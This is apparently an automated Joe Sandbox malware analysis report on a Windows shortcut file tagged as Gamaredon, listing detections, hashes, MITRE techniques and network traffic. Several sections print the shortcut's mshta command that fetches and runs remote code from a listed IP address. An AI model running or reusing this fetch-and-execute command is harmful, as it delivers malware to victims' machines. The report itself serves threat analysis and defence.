Windows Analysis Report
3d#U044f.lnk

Overview

General Information

Sample name:3d#U044f.lnk
renamed because original name is a hash value
Original sample name: . .lnk
Analysis ID:1428420
MD5:c5140207d2276f64b3a8f4ccd3487723
SHA1:4d688086cd47a23444b2329fbd83a3740c40d0ca
SHA256:4102d9b119dd8eb1f4e74ccea7c23fa7fc84d44cb8079abdabbe51629ea25ec4
Tags: apt, Gamaredon, lnk

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Found URL in windows shortcut file (LNK)
Machine Learning detection for sample
Windows shortcut file (LNK) contains suspicious command line arguments
Internet Provider seen in connection with other malware
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • mshta.exe (PID: 6632 cmdline: "C:\Windows\System32\mshta.exe" http://194.180.191.34/pr/relationship.tmp /f MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: 3d#U044f.lnk | Avira: detected
Source: 3d#U044f.lnk | ReversingLabs: Detection: 23%
Source: 3d#U044f.lnk | Joe Sandbox ML: detected

Networking

Source: Joe Sandbox View | ASN Name: MIVOCLOUDMD MIVOCLOUDMD
Source: global traffic | HTTP traffic detected: GET /pr/relationship.tmp HTTP/1.1; Accept: */*; Accept-Language: en-CH; UA-CPU: AMD64; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729); Host: 194.180.191.34; Connection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 194.180.191.34
Source: mshta.exe, 00000000.00000002.2641916016.000001374E6F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2641916016.000001374E7DB000.00000004.00000020.00020000.00000000.sdmp, 3d#U044f.lnk | String found in binary or memory: http://194.180.191.34/pr/relationship.tmp
Source: mshta.exe, 00000000.00000002.2641916016.000001374E753000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://194.180.191.34/pr/relationship.tmp%
Source: mshta.exe, 00000000.00000002.2641916016.000001374E7B6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://194.180.191.34/pr/relationship.tmp...
Source: mshta.exe, 00000000.00000002.2642393986.000001374E870000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://194.180.191.34/pr/relationship.tmp/fternet
Source: mshta.exe, 00000000.00000002.2641916016.000001374E6FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://194.180.191.34/pr/relationship.tmp1
Source: mshta.exe, 00000000.00000002.2641916016.000001374E7DB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://194.180.191.34/pr/relationship.tmpC:
Source: mshta.exe, 00000000.00000002.2641916016.000001374E716000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://194.180.191.34/pr/relationship.tmpE
Source: mshta.exe, 00000000.00000002.2641916016.000001374E768000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://194.180.191.34/pr/relationship.tmpndowsINetCookies
Source: mshta.exe, 00000000.00000002.2641916016.000001374E716000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://194.180.191.34/pr/relationship.tmpq
Source: mshta.exe, 00000000.00000002.2641916016.000001374E768000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://194.180.191.34/pr/relationship.tmpvJ
Source: mshta.exe, 00000000.00000002.2641916016.000001374E753000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://194.180.191.34/pr/relationship.tmpy
Source: mshta.exe, 00000000.00000002.2641916016.000001374E768000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com

System Summary

Source: Initial file | Strings: http://194.180.191.34/pr/relationship.tmp
Source: 3d#U044f.lnk | LNK file: http://194.180.191.34/pr/relationship.tmp /f
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: classification engine | Classification label: mal76.rans.winLNK@1/0@0/1
Source: C:\Windows\System32\mshta.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\relationship[1].ps
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 3d#U044f.lnk | ReversingLabs: Detection: 23%
Source: C:\Windows\System32\mshta.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: ieframe.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: netapi32.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dataexchange.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: d3d11.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dcomp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: msls31.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: d2d1.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dwrite.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: d3d10warp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dxcore.dll
Source: C:\Windows\System32\mshta.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Persistence and Installation Behavior

Source: LNK file | Process created: C:\Windows\System32\mshta.exe
Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: mshta.exe, 00000000.00000002.2641916016.000001374E768000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWp_
Source: mshta.exe, 00000000.00000002.2641916016.000001374E753000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2641916016.000001374E7AA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation

MITRE ATT&CK Matrix (techniques listed per tactic; a number before a technique is the count of signatures matched to it)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses
Resource Development: Acquire Infrastructure; Domains; DNS Server
Initial Access: Valid Accounts; Default Accounts; Domain Accounts
Execution: Windows Management Instrumentation; Scheduled Task/Job; At
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows)
Privilege Escalation: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows)
Defense Evasion: 1 Masquerading; 1 DLL Side-Loading; Obfuscated Files or Information
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager
Discovery: 1 Security Software Discovery; 1 Process Discovery; 12 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares
Collection: 1 Email Collection; Data from Removable Media; Data from Network Shared Drive
Command and Control: 1 Non-Application Layer Protocol; 11 Application Layer Protocol; 1 Ingress Tool Transfer
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact
Antivirus detection for the submitted file:

Source        Detection  Scanner         Label
3d#U044f.lnk  24%        ReversingLabs   Shortcut.Trojan.ShortSeek
3d#U044f.lnk  100%       Avira           LNK/Dldr.Agent.VPHZ
3d#U044f.lnk  100%       Joe Sandbox ML

No Antivirus matches
No contacted domains info
Contacted URLs:

Name                                        Malicious  Antivirus Detection  Reputation
http://194.180.191.34/pr/relationship.tmp   true                            unknown

URLs found in memory or binary data:

Name                                                        Source                                                                                            Malicious  Reputation
http://194.180.191.34/pr/relationship.tmp1                  mshta.exe, 00000000.00000002.2641916016.000001374E6FE000.00000004.00000020.00020000.00000000.sdmp  false      unknown
http://194.180.191.34/pr/relationship.tmpq                  mshta.exe, 00000000.00000002.2641916016.000001374E716000.00000004.00000020.00020000.00000000.sdmp  false      unknown
http://194.180.191.34/pr/relationship.tmpndowsINetCookies   mshta.exe, 00000000.00000002.2641916016.000001374E768000.00000004.00000020.00020000.00000000.sdmp  false      unknown
http://194.180.191.34/pr/relationship.tmp%                  mshta.exe, 00000000.00000002.2641916016.000001374E753000.00000004.00000020.00020000.00000000.sdmp  false      unknown
http://194.180.191.34/pr/relationship.tmpE                  mshta.exe, 00000000.00000002.2641916016.000001374E716000.00000004.00000020.00020000.00000000.sdmp  false      unknown
http://194.180.191.34/pr/relationship.tmp/fternet           mshta.exe, 00000000.00000002.2642393986.000001374E870000.00000004.00000020.00020000.00000000.sdmp  false      unknown
http://194.180.191.34/pr/relationship.tmpy                  mshta.exe, 00000000.00000002.2641916016.000001374E753000.00000004.00000020.00020000.00000000.sdmp  false      unknown
http://194.180.191.34/pr/relationship.tmpvJ                 mshta.exe, 00000000.00000002.2641916016.000001374E768000.00000004.00000020.00020000.00000000.sdmp  false      unknown
http://194.180.191.34/pr/relationship.tmp...                mshta.exe, 00000000.00000002.2641916016.000001374E7B6000.00000004.00000020.00020000.00000000.sdmp  false      unknown
http://194.180.191.34/pr/relationship.tmpC:                 mshta.exe, 00000000.00000002.2641916016.000001374E7DB000.00000004.00000020.00020000.00000000.sdmp  false      unknown

Contacted IPs:

IP              Domain   Country  ASN    ASN Name     Malicious
194.180.191.34  unknown  unknown  39798  MIVOCLOUDMD  true
                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1428420
                        Start date and time:2024-04-18 22:48:05 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 4m 0s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:8
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:3d#U044f.lnk
                        renamed because original name is a hash value
                        Original Sample Name: . .lnk
                        Detection:MAL
                        Classification:mal76.rans.winLNK@1/0@0/1
                        EGA Information:Failed
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Found application associated with file extension: .lnk
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • VT rate limit hit for: 3d#U044f.lnk
No simulations
No context

Other samples seen on the same ASN (Joe Sandbox View context for MIVOCLOUDMD):

Match        Associated Sample Name / URL  Detection  Threat Name    Context
MIVOCLOUDMD  kg1aLpgpPi.elf                malicious  Gafgyt, Mirai  5.252.177.70
MIVOCLOUDMD  6YHwDFGf9O.elf                malicious  Gafgyt, Mirai  5.252.177.70
MIVOCLOUDMD  YZeFXIpII1.elf                malicious  Gafgyt, Mirai  5.252.177.70
MIVOCLOUDMD  W7dPx08oeA.elf                malicious  Gafgyt, Mirai  5.252.177.70
MIVOCLOUDMD  0A0Lc8FV8m.elf                malicious  Gafgyt, Mirai  5.252.177.70
MIVOCLOUDMD  N0wGJewAkm.elf                malicious  Gafgyt, Mirai  5.252.177.70
MIVOCLOUDMD  NmhkcWRcsl.elf                malicious  Gafgyt, Mirai  5.252.177.70
MIVOCLOUDMD  r0Div1MfcS.elf                malicious  Gafgyt, Mirai  5.252.177.70
MIVOCLOUDMD  HMOmi54a40.elf                malicious  Gafgyt, Mirai  5.252.177.70
MIVOCLOUDMD  t42HNtzR7u.elf                malicious  Gafgyt, Mirai  5.252.177.70

No context
                        No created / dropped files found
                        File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Working directory, Has command line arguments, Icon number=98, Archive, ctime=Sun Oct 1 19:50:20 2023, mtime=Sun Oct 1 19:50:20 2023, atime=Mon Jan 1 03:48:41 2018, length=14848, window=hide
                        Entropy (8bit):3.1891995388773204
                        TrID:
                        • Windows Shortcut (20020/1) 100.00%
                        File name:3d#U044f.lnk
                        File size:1'827 bytes
                        MD5:c5140207d2276f64b3a8f4ccd3487723
                        SHA1:4d688086cd47a23444b2329fbd83a3740c40d0ca
                        SHA256:4102d9b119dd8eb1f4e74ccea7c23fa7fc84d44cb8079abdabbe51629ea25ec4
                        SHA512:ac0a2830b6f4bc36901252f1c0dc575f07a24c3194dec822964f59f6f7291e64e23522a8c956afd24de68122b782aa283ce97ef2e4720587feb2bd67a443c210
                        SSDEEP:24:84NUgXnhSSx8Aie1RcNLQO8cS6ce54QZab+mE:8EjDbHSZaq
                        TLSH:E53110243FCA2227E6B98E37500EE701D798750BDA02DF2D42E1408CA875500BC7DDBE
                        File Content Preview:L..................F.... ....v.......v.......x.......:..b...................;....P.O. .:i.....+00.../C:\...................V.1.....BW....Windows.@........H.0BW......(.....................g.7.W.i.n.d.o.w.s.....Z.1......X.<..System32..B........H.0.X.<......
                        Icon Hash:c2daaaa6a6a9a92d

                        General

                        Relative Path:
                        Command Line Argument:http://194.180.191.34/pr/relationship.tmp /f
                        Icon location:%Windir%\system32\SHELL32.dll
TCP packets:

Timestamp                             Source Port  Dest Port  Source IP        Dest IP
Apr 18, 2024 22:48:59.275090933 CEST  49705        80         192.168.2.8      194.180.191.34
Apr 18, 2024 22:48:59.514516115 CEST  80           49705      194.180.191.34   192.168.2.8
Apr 18, 2024 22:48:59.514955044 CEST  49705        80         192.168.2.8      194.180.191.34
Apr 18, 2024 22:48:59.514955044 CEST  49705        80         192.168.2.8      194.180.191.34
Apr 18, 2024 22:48:59.754508018 CEST  80           49705      194.180.191.34   192.168.2.8
Apr 18, 2024 22:49:00.641921043 CEST  80           49705      194.180.191.34   192.168.2.8
Apr 18, 2024 22:49:00.642270088 CEST  49705        80         192.168.2.8      194.180.191.34
Apr 18, 2024 22:49:05.649599075 CEST  80           49705      194.180.191.34   192.168.2.8
Apr 18, 2024 22:49:05.649676085 CEST  49705        80         192.168.2.8      194.180.191.34
Apr 18, 2024 22:50:49.237449884 CEST  49705        80         192.168.2.8      194.180.191.34
Apr 18, 2024 22:50:49.830979109 CEST  49705        80         192.168.2.8      194.180.191.34
Apr 18, 2024 22:50:51.002893925 CEST  49705        80         192.168.2.8      194.180.191.34
Apr 18, 2024 22:50:53.346483946 CEST  49705        80         192.168.2.8      194.180.191.34
Apr 18, 2024 22:50:58.034218073 CEST  49705        80         192.168.2.8      194.180.191.34
Apr 18, 2024 22:51:07.408987999 CEST  49705        80         192.168.2.8      194.180.191.34

HTTP sessions:

Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
0           192.168.2.8  49705        194.180.191.34   80                6632  C:\Windows\System32\mshta.exe

HTTP request/response data:

Timestamp                             Bytes transferred  Direction  Data
Apr 18, 2024 22:48:59.514955044 CEST  337                OUT        GET /pr/relationship.tmp HTTP/1.1
                                                                    Accept: */*
                                                                    Accept-Language: en-CH
                                                                    UA-CPU: AMD64
                                                                    Accept-Encoding: gzip, deflate
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                    Host: 194.180.191.34
                                                                    Connection: Keep-Alive
Apr 18, 2024 22:49:00.641921043 CEST  201                IN         HTTP/1.1 200 OK
                                                                    Date: Thu, 18 Apr 2024 20:48:59 GMT
                                                                    Server: Apache/2.4.59 (Debian)
                                                                    Content-Length: 0
                                                                    Keep-Alive: timeout=5, max=100
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/postscript


                        Target ID:0
                        Start time:22:48:58
                        Start date:18/04/2024
                        Path:C:\Windows\System32\mshta.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\System32\mshta.exe" http://194.180.191.34/pr/relationship.tmp /f
                        Imagebase:0x7ff74d5b0000
                        File size:14'848 bytes
                        MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:false

                        No disassembly